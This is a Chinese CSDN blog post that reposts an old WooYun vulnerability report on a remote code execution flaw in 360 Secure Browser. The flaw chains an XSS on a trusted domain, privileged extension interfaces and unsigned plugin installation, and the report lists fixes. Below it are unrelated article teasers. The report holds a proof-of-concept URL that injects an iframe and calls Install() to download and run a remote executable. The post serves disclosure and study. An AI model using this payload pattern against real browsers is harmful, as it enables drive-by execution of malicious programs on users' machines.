学习日志13:360安全浏览器远程代码执行漏洞

最新推荐文章于 2024-04-26 09:33:44 发布
最新推荐文章于 2024-04-26 09:33:44 发布
阅读量501 收藏
点赞数
分类专栏: 学习笔记 文章标签: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37622973/article/details/101154700
版权

本文摘自乌云
出处:http://www.anquan.us/static/bugs/wooyun-2010-020.html
作者:结界师
缺陷编号:WooYun-2010-00020

1.漏洞基本情况:关键页面的XSS+任意插件安装+插件安装时不检验来源–>任意代码执行

2.详细说明:
360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为域名a.b.c.d(假设)才可以调用这些接口。而此域名中存在XSS漏洞。从而可以使用js直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

3.漏洞证明:
http://a.b.c.d/v3/guide/guide_start.htm?ver=a.b.c.d&firstcheck=1&1="><iframe name=“fuck” src=“http://a.b.c.d/v3/plugins.htm” οnlοad=alert(fuck.window.eval(“Install(‘ExtWebMail’,‘a.b.c.d3’,‘360邮件通’,‘http://a.b.c.d/ExtWebmail.zip’,‘a.b.c.d’)”))>< /iframe>

其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

4.修复方案:
(1)修复xss(无法解决域名a.b.c.d下的其他安全问题)
(2)验证程序的来源(无法解决其他接口的问题)

丫郎酸
关注
专栏目录
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
安全攻防基础以及各种漏洞
weixin_54626591的博客
08-31 1246
安全攻防基础以及各种漏洞
360安全浏览器竟然也被查出高危漏洞?开源安全问题不容忽视
Qschecker的博客
07-26 449
分析报告http://hn.cvecn.com/detail.php?md5=429824f12a56b25c2286404a7eef5a14 随着开源社区的蓬勃发展,现在很难找到一款完全不包含任何开源组件的程序。而开源组件的安全性问题却没有得到足够重视,甚至有人认为开源软件都是安全的,其实不然。 开源安全的特点: 1. 由于源代码公开,所有发现的漏洞都会被第一时间公布,因此也容易被...
360发现EOS高危漏洞:可在节点远程执行任意代码
区块链斜杠青年(爱踢门)
05-29 2121
品途商业评论(ID:pintu360)讯,今日中午,360安全卫士官方微博发布消息称,360公司Vulcan(伏尔甘)团队发现了区块链平台EOS的一系列高危安全漏洞。经验证,其中部分漏洞可以在EOS节点上远程执行任意代码,即可以通过远程攻击,直接控制和接管EOS上运行的所有节点。据360方面介绍,由于区块链网络去中心化的计算特点。一个区块链节点实现上的安全漏洞,可能引发成千上万的节点遭到攻击。甚至...
安卓WebView中接口隐患与手机挂马利用(远程命令执行
weixin_30756499的博客
09-05 421
安卓应用存在安全漏洞,浏览网站打开链接即可中招。目前有白帽子提交漏洞表明目前安卓平台上的应用普遍存在一个安全漏洞,用户打开一个链接就可导致远程安装恶意应用甚至完全控制用户手机,目前微信,手机QQ,QVOD以及各大手机浏览器均中招 0x00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等...
谷歌浏览器调用本地exe_赶紧打补丁!黑客利用谷歌浏览器零日漏洞CVE-2019-13720发起攻击...
weixin_39947501的博客
12-08 217
最近,卡巴斯基实验室发现了一场黑客攻击行动,并将其命名为“Operation WizardOpium”。在这场攻击行动中,攻击者利用了谷歌浏览器中的一个尚未公开的漏洞——CVE-2019-13720,并试图嫁祸给朝鲜黑客组织“Lazaru(拉撒路)”。技术细节在一个韩语新闻门户网站上,攻击者在主页中插入了恶意的JavaScript代码,以从远程网站上加载配置脚本。如你所想,这就是传说中的“水坑攻击...
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
最新发布
zz12345600354的博客
04-26 697
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
等保2.0测评手册之安全计算环境
AI
05-20 1611
可以将本文安全计算环境等保2测评手册直接用于工作中,整改工作内容:控制点,安全要求,要求解读,测评方法,预期结果或主要证据
360浏览器
02-15
360浏览器
360浏览器兼容模式代码
Menqq的博客
06-01 1074
在页面head加:<meta http-equiv="X-UA-Compatible" content="IE=11"> 告诉浏览器最少使用IE11的内核去解析 能解决IE7内核下的很多问题; 在head标签中添加一行代码: <html> <head> <meta name="renderer" content="ie-comp"> </head> <body> </body> </html> 可
再见,360浏览器!我用60行Python代码制作一款浏览器
cainiao_python的博客
05-10 4221
点上方“菜鸟学Python”,选择“星标” 第476篇原创干货,第一时间送达 对于日常网上冲浪的朋友们,浏览器是大家必不可少的一个工具,市面上也存在各种款式的浏览器,例如谷歌浏览器360...
selenium使用第三方浏览器(例360安全浏览器
热门推荐
weixin_42358470的博客
02-25 1万+
首先python解释器我使用python3.6,其他应该也可以, 接下来安装pip install selenium 安装以后安装360安全浏览器360浏览器是使用的chrome内核,安装后找到帮助-关于-查看内核版本根据内核版本下载相应的 浏览器驱动(chrome) 注意:一定要根据自已的chrome版本来下载对应的chromedriver 浏览器内核对应chromedriver版本...
websocket在360浏览器中 sessionId和 http的sessionId不一致问题
sinat_34704593的博客
12-05 1362
现象:在360浏览器中发现websocket请求出现了302,往后追原因发现是因为后台认为这条请求不是登录过了,然后将请求重定向至登录页。导致websocket无法建立。 但是普通的http请求却是正常的,再细看发现http请求的sessionId和websocket中的不一致。 原因:原因是因为360的兼容模式切换至极速模式时可以将cookie正常带过去,但是极速模式切换至兼容模式时却无法将w...
phpstudy后门代码利用及分析
feichang2的博客
10-04 1903
几天前火绒说我的PHPstudy有马,我以为是误报没有在意,但接着我就在知乎上看到了PHPstudy真可能有后门,于是赶紧看了一下,还真有,是我之前下的2016版的,而我在官网下的2019的phpstudy_pro没有问题 可以看到php-5.2.17/ext/php_xmlrpc.dll和php-5.4.45/ext/php_xmlrpc.dll里有可疑的@eval字符,看来是有一句话了 根据...
360极速浏览器连接远程notebook会出现问题,403 GET /api/kernels/
kaggle expert,全球排名前1000,清华计算机研究生,兴趣算法工程
07-18 877
360极速浏览器如果使用过一段时间远程jupyter会出现这种连接问题,这其实是浏览器的问题。 所以换了chrome浏览器之后成功运行。
判断360浏览器代码
csstome
10-25 339
以下是判断360浏览器代码: &lt;html xmlns="http://www.w3.org/1999/xhtml" &gt; &lt;SCRIPT LANGUAGE="JavaScript"&gt; function Is360() {if (window.navigator.userAgent.toLowerCase().indexOf("360se")&gt;=1)//如果浏...
漏洞大爆光:QQ漏洞、飞秋漏洞360浏览器劫持…
黑马程序员官方博客
05-08 1万+
QQ、飞秋、360浏览器出现漏洞啦,大家速速前来围观,还有更多软件漏洞后续再发布
如何检测CVE-2024-38077漏洞:Windows远程代码执行
CVE-2024-38077是一个特定的安全漏洞标识,它指的是在Windows远程桌面授权服务中发现的远程代码执行漏洞。此类漏洞允许攻击者通过远程桌面协议(RDP)在目标系统上执行任意代码。这种安全漏洞的严重性很高,因为攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值